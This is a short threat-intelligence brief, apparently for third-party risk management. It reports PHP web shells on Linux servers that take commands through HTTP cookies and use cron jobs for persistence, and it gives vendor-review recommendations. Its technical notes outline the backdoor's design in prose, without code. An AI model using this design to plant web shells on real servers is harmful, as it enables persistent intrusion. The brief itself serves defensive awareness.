Cookie‑Controlled PHP Web Shells Enable Persistent Remote Code Execution on Linux Servers
What Happened — Microsoft Defender Security Research uncovered a new attacker technique that embeds command‑and‑control logic in HTTP cookies. The malicious PHP web shells run on Linux web servers and use the cookie values to trigger remote code execution, persisting via cron jobs to survive reboots.
Why It Matters for TPRM —
- The method bypasses traditional URL‑parameter filtering and can evade many web‑application firewalls.
- Persistence through cron makes detection harder, increasing the window of exposure for third‑party services.
- Any SaaS, hosting, or managed‑service provider that runs PHP on Linux is a potential attack surface.
Who Is Affected — Cloud hosting providers, managed service providers (MSPs), SaaS platforms, and any organization that runs PHP‑based web applications on Linux servers.
Recommended Actions —
- Review contracts with vendors that host PHP applications for evidence of secure coding and hardening practices.
- Verify that vendors monitor for anomalous cookie values and have runtime integrity checks for cron jobs.
- Require regular scanning for unauthorized web shells and enforce least‑privilege execution contexts.
Technical Notes — Attackers embed a lightweight PHP backdoor that reads a specific cookie (e.g., X-Auth-Token) and executes its base64‑decoded payload. Persistence is achieved by installing a cron entry that re‑creates the shell if removed. No CVE is cited; the technique exploits standard PHP functionality and default cron configurations. Source: The Hacker News